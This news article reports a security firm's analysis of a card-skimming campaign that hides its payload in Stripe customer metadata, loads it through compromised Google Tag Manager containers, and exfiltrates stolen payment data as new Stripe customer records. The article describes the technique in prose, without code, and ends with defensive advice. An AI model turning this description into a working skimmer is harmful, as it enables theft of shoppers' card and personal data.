An emerging wave of rather concerning online theft is leveraging one of the Fintech sector’s most widely used platforms in order to conceal and reportedly distribute malicious code designed to harvest sensitive payment details. Security researchers have uncovered a refined Magecart-style campaign that cleverly repurposes Stripe‘s infrastructure not only to deliver its card-stealing scripts but also to securely store and transmit the pilfered information from compromised e-commerce sites.
This approach marks an evolution in web skimming tactics. Some of the more traditional Magecart attacks typically rely on attacker-controlled domains to host payloads and exfiltrate data, making them easier to detect through network monitoring or Content Security Policy (CSP) restrictions.
In contrast, this operation routes everything through domains that online retailers already trust implicitly: those associated with Google Tag Manager (googletagmanager.com) and Stripe’s API endpoints (api.stripe.com).
According to a detailed analysis by e-commerce security specialists at Sansec, the attack begins with the injection of seemingly benign code via compromised Google Tag Manager containers.
These containers, often added by site administrators for analytics or marketing purposes, load on every page visit.
When a shopper navigates to the checkout section—typically on Magento or Adobe Commerce platforms—the loader fetches a concealed JavaScript payload stored within the metadata fields of a specific Stripe customer record.
The payload is fragmented across multiple metadata entries to bypass length limits, then reassembled and executed dynamically in the browser using techniques like new Function().
Once active, the skimmer monitors the checkout process, capturing not just credit card numbers, expiration dates, and CVV codes, but also full billing addresses, names, email addresses, phone numbers, and even order totals.
The harvested data is obfuscated through XOR encryption and temporarily held in the browser’s localStorage before a separate routine handles upload.
Exfiltration occurs discreetly: shortly after page loads and at one-minute intervals, the system splits the encrypted blob and creates new “customer” records in the attacker’s Stripe account.
This turns Stripe‘s own database into a covert storage system for stolen cards, with each record masquerading as legitimate user data.
After successful transmission, local traces are erased to avoid detection and duplication.
The campaign’s Stripe customer record dates back to December 24, 2025, indicating it may have been operational for months.
Researchers also identified a parallel variant that substitutes Google Firestore for Stripe, pulling payloads from documents designed to mimic legitimate payment or CAPTCHA-related traffic.
Both methods exploit the fact that major cloud and payment APIs are rarely blocked, allowing the malware to evade many conventional defenses.
This abuse highlights broader risks in the interconnected digital ecosystem.
By embedding a test-mode Stripe secret key directly in client-side scripts—an unmistakable sign of compromise—attackers gain a resilient command-and-control channel without maintaining their own infrastructure.
E-commerce operators are urged to audit third-party scripts, monitor for unauthorized GTM tags, and scan regularly for anomalies. Consumers can mitigate personal risk by using virtual cards with spending limits.
The incident underscores the ongoing sort of cat-and-mouse game between cybercriminals and platform providers.
As global fintech services become more embedded in daily commerce, their trusted status makes them prime targets for evasion tactics. Given these developments, it is clear now that global businesses must effectively prioritize client-side security alongside backend protections to safeguard sensitive customer data.